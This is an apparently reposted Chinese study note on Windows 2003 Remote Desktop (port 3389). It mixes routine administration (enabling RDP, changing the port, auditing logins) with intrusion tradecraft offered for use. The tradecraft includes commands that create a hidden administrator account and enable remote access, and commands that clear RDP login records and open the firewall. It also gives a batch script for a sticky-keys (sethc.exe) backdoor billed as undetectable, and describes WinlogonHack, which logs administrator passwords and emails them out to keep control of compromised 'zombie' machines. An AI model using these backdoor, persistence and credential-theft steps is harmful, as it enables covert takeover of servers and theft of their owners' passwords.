3389学习笔记

来源:互联网 发布:小猪网络 编辑:程序博客网 时间:2024/05/16 05:10

Windows 2003开启远程终端

1,  允许开启

在我的电脑,属性,远程,选允许连接到这台计算机。

2,  授权用户

可以添加用户。

3,  查看端口开放情况

Netstat –an或者netstat –an|find “3389”

4,  远程登录

运行mstsc程序,地址写刚刚那台服务器的ip或域名。然后连接,之后输入用户名和密码。

常见的开启远程端口的方法:

1,  使用vbs脚本,

2,  使用bat批处理命令

echo[Components]>c:\sql

echoTSEnable=on>>c:\sql 

sysocmgr/i:c:\winnt\inf\sysoc.inf/u:c:\sql/q

这里的winnt应该就是相当于windows

3,  编写导入注册表文件

命令行:

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f  reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 

4,  Sql注入软件启动

5,  其他软件

DameWare Mini Remote Control

这里面好多方法都比较老,对付的都是windows2000或者xp

来自国外黑客的开启命令:

1.  net user antian365.com antian365 /add  

2.  net localgroup Administrators  antian365.com /add  

3.  net localgroup "Remote Desktop Users"  antian365.com /add  

4.  attrib +h "%SYSTEMDRIVE%\Documents and Settings\antian365.com" /S /D  

5.  echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0  

6.  echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1  

7.  echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "antian365.com" /t REG_DWORD /d 00000000 /f  

8.  sc config rasman start= auto 

9.  sc config remoteaccess start= auto 

10. net start rasman  

11. net start remoteaccess

 

既然3389这么危险,所以更改这个默认端口就很有必要了。

1, 在命令行下批处理命令

1.  REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 0X22B8 /f  

2.  REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"  /v PortNumber /t REG_DWORD /d 0X22B8 /f  

这里要用16进制。

2, 图形化修改:

在注册表local_machinesystem\currntcontrolsetcontrol\control\terminal server\wds\rdpwd\tds\tcp里面的portnumber改掉。同时该

system\currntcontrolsetcontrol\control\terminal server\winstations\rdp-tcp里面的portnumber。然后在连接的时候就在ip后面加上端口号192.168.1.128:12345

 

 

改好了之后呢要查看一下。

通过vbs脚本就不写了,好多系统都不让跑。通过注册表查询:

1.  REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\ WinStations\RDP-Tcp /v PortNumber 

这个命令在我这有语法错误。费解。用这个也不错:

regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"

生成一个注册表文件。然后在 type tsp.reg

 

至于那个控制终端用户的操作界面,就是让你们在一起操作,没兴趣。不过查看当前控制用户命令不错。

Query session就能显示你的用户id号了。然后想和b乱搞。就shadow bid号。然后b上就有显示了。他同意你们就可以开始了。如果不想玩了,loggff退出。

在共同管理计算机时,普通的关机不会通知别的用户,但是用tsshutdn 15 /powerdown15秒内关机就能通知。并且按ctrl + c可以取消。

小技巧:query process,query user.

Iisreset /reboot /timeout:00    重启命令。

mstsc的快捷键:CTRL+ALT+END任务管理器,BREAK,全屏

ALT+PGUP/DOWN 程序切换

ALT+HOME 开始,可以这样再结合其他的快捷键。

 

限制用户和用户组。

在服务器端,管理工具,终端服务配置,连接,在选择右面rdptcp的属性,权限,就能改了,可以白所有组都删除,然后只留一个自己的。就算有管理员密码也不好使了。

 

 

记录登陆信息

在上面那个属性,审核里面,单机添加,然后选择用户是点高级,立即查找,添加everyone,然后审核

登陆的全部

连接,注销,断开的成功。我猜这个就是存放在注册表里面的。

然后是可以在指定文件里记录登录信息。

同样,在那个rdptcp属性里面,有个环境,点击登录时启动这个程序。写bat程序的绝对路径,和路径,然后就ok了。

付上3389.bat

1.  date /t >>3389log.txt   

2.  time /t >>3389log.txt   

3.  netstat -n -p tcp | find ":3389">>3389log.txt  

4.  start Explorer  

11.实用技巧之十一--清除3389的登录记录

用一条系统自带的命令:

1.  reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client"  /f 

在我的电脑里找不到,这里属于注册表攻击了。

取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制

1.  REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\ FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f 

12.实用技巧之十二--去掉限制登录

终端超出最大连接数时可用下面的命令来连接

1.  mstsc /v:ip:3389 /console 

13.实用技巧之十三--永不查杀的3389后门

永不查杀的3389后门其原理就是利用shift后门,连敲5Shift键即可直接进入服务器。将以下代码复制到服务器上通过DOS命令提示符窗口执行即可。

1.  @echo off  

2.  copy c:\windows\explorer.exe c:\windows\system32\sethc.exe  

3.  copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe  

4.  attrib c:\windows\system32\sethc.exe +h  

5.  attrib c:\windows\system32\dllcache\sethc.exe +h  

6.  echo. & pause  

7.  Exit  

14.实用技巧之十四--WinlogonHack记录3389登录密码,哈哈,这个软件。

WinlogonHack的原理很简单就是记录管理员登录的密码,当有3389登上时,自动加载DLL,并且记录登录密码!保存为boot.dat文件。最新的一些版本已经可以将记录的密码发送到指定的邮箱,只要服务器连接网络,那么肉鸡就永远不会丢失。

 

0 0
原创粉丝点击